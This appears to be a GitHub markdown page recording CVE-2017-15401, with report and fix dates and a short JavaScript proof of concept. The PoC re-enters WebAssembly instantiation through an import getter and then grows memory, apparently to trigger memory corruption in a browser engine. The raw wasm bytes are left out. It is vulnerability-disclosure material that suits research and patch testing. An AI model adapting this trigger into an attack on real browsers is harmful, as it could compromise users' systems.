CVE-2017-15401

Report: Sep 2017
Fix: Oct 2017

PoC

// raw_wasm = ...
var mod = WebAssembly.Module(raw_wasm);
var ffi = {
  mod: {
    get imp() {
      wasm2 = WebAssembly.Instance(mod, {mod: {imp: function(){}}});
      spacer = new ArrayBuffer(0x10000);
      return function() {};
    }
  }
};
wasm = WebAssembly.Instance(mod, ffi);
wasm2.exports.memory.grow(1);
// wasm.exports.XXX

Reference

Issue

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2017-15401.md

CVE-2017-15401.md

CVE-2017-15401

PoC

Reference

Files

CVE-2017-15401.md

Latest commit

History

CVE-2017-15401.md

File metadata and controls

CVE-2017-15401

PoC

Reference